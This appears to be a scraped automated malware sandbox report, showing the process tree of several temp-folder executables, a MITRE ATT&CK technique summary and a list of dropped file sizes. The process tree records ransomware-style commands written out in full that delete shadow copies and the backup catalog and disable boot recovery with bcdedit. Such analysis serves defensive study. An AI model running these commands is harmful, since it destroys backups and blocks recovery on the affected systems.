C:\Users\Admin\AppData\Local\Temp\B207.exeC:\Users\Admin\AppData\Local\Temp\B207.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 2362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3360 -ip 33601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\47DF.exeC:\Users\Admin\AppData\Local\Temp\47DF.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6400 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Local\Temp\9C79.exeC:\Users\Admin\AppData\Local\Temp\9C79.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 72 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Local\Temp\4E8.exeC:\Users\Admin\AppData\Local\Temp\4E8.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 03⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\4E8.exe"C:\Users\Admin\AppData\Local\Temp\4E8.exe" -agent 02⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\75A.exeC:\Users\Admin\AppData\Local\Temp\75A.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"2⤵
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 6328 -ip 63281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4240 -ip 42401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3872 -ip 38721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3992 -ip 39921⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6400 -ip 64001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 8052 -ip 80521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 72 -ip 721⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 416 -p 2264 -ip 22642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6948 -ip 69482⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 3912 -ip 39122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1604 -ip 16042⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5764 -ip 57642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7556 -ip 75562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6884 -ip 68842⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10228 -ip 102282⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 10524 -ip 105242⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5768 -ip 57682⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 10212 -ip 102122⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 13300 -ip 133002⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10584 -ip 105842⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 10680 -ip 106802⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8736 -ip 87362⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4136 -ip 41362⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 8024 -ip 80242⤵
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 3944 -ip 39441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3896 -ip 38961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2136 -ip 21361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6608 -ip 66081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 12392 -ip 123921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 12460 -ip 124601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3840 -ip 38401⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
5File Deletion
1Impair Defenses
1Modify Registry
7Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
628KB
-
Filesize
40KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
100KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
188KB
-
Filesize
6.1MB
-
Filesize
912KB
-
Filesize
1.4MB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
188KB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
192KB
-
Filesize
6.1MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
12KB
-
Filesize
628KB
-
Filesize
9.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
88KB
-
Filesize
5.6MB
-
Filesize
6.1MB
-
Filesize
128KB
-
Filesize
6.1MB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
5.6MB
-
Filesize
6.1MB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
1.2MB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
6.1MB
-
Filesize
1.4MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
5.6MB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
5.6MB
-
Filesize
6.1MB